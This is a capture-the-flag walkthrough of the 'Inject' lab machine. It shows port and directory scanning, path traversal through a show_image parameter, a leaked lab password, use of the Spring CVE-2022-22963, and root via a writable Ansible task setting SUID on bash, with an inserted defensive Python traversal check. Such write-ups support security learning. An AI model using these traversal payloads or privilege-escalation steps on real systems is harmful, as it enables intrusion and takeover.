/etc/hosts
nmap
nmap -sV -vvv -p- inject.htb -sC
feroxbuster
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://inject.htb:8080
http://inject.htb:8080/release_notes
http://inject.htb:8080/upload
I intercept it with Burp Suite.
Let’s try other extensions:
.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
The upload succeeds, but the PHP code is not executed.
fuzzing for LFI
http://inject.htb:8080/show_image?img=../../../../../../../etc/passwd
I’ve tried to fuzz it.
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt -u 'http://inject.htb:8080/show_image?img=FUZZ' -fc 500
But I found nothing interesting.
LFI in GET
Replace the POST with a GET and the image name with a directory path.
Now let’s browse into the home directory.
There are 2 users, but we can only browse into frank’s directory.
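As an added, defender-side example that is not part of this write-up: the path-containment check the show_image?img= endpoint above is missing, plus a pass over constructed access-log lines that flags the requests such a check would reject. The real target is a Spring Boot (Java) application; this Python version is illustrative only, and IMAGE_ROOT, the log format and the client address are assumptions.

```python
from pathlib import Path
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

IMAGE_ROOT = Path("/var/www/images")  # assumed image directory (hypothetical)


def resolve_image(img: str, root: Path = IMAGE_ROOT) -> Optional[Path]:
    """Return the on-disk path for a requested image, or None if the request
    would escape the image root (traversal) or names a directory."""
    if not img or img.startswith(("/", "\\")):
        return None  # empty names and absolute paths are never valid
    root_resolved = root.resolve(strict=False)
    # Normalise ".." and symlinks *after* joining with the root, then require
    # the result to still sit strictly below the root.
    candidate = (root / img).resolve(strict=False)
    if candidate == root_resolved or candidate.is_dir():
        return None  # a directory listing is not an image request
    try:
        candidate.relative_to(root_resolved)
    except ValueError:
        return None  # escaped the root, e.g. ../../../../etc/passwd
    return candidate


def flag_traversal_requests(log_lines: Iterable[str], root: Path = IMAGE_ROOT) -> List[str]:
    """Return the request targets of access-log lines whose img= parameter
    resolve_image would reject: a cheap after-the-fact detection check."""
    hits: List[str] = []
    for line in log_lines:
        # Common Log Format: '... "GET /show_image?img=x HTTP/1.1" 200 512'
        parts = line.split('"')
        if len(parts) < 3:
            continue
        request = parts[1].split()
        if len(request) < 2 or not request[1].startswith("/show_image"):
            continue
        target = request[1]
        for img in parse_qs(urlsplit(target).query).get("img", []):
            if resolve_image(img, root) is None:
                hits.append(target)
    return hits


# Constructed sample log lines (not from the box); 203.0.113.7 is a documentation address.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2023:12:00:00 +0000] "GET /show_image?img=logo.png HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2023:12:00:01 +0000] "GET /show_image?img=../../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2023:12:00:02 +0000] "GET /show_image?img=../../../../../../../home HTTP/1.1" 200 4096',
]
```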
phil
DocPhillovestoInject123
It’s not working with SSH.
springframework
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.6.5</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
We have the version and the name of the framework.
2.6.5
https://codetinkering.com/spring4shell-vulnerability-fix/
CVE-2022-22965 is not working.
It should be CVE-2022-22963.
Let’s execute it.
Lateral movement
I have a shell; now we can try to reuse the creds.
Now I will upgrade my shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm # allow clear command
Then Ctrl + Z
stty raw -echo; fg # allow auto completion
Now I use lse.sh:
Just google it to find the Ansible docs.
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/
I found a task in /opt/ansible/tasks/ that I was able to write to.
- hosts: localhost
  tasks:
    - name: Evil
      ansible.builtin.shell: |
        chmod +s /bin/bash
      become: true
bash -p
I’m root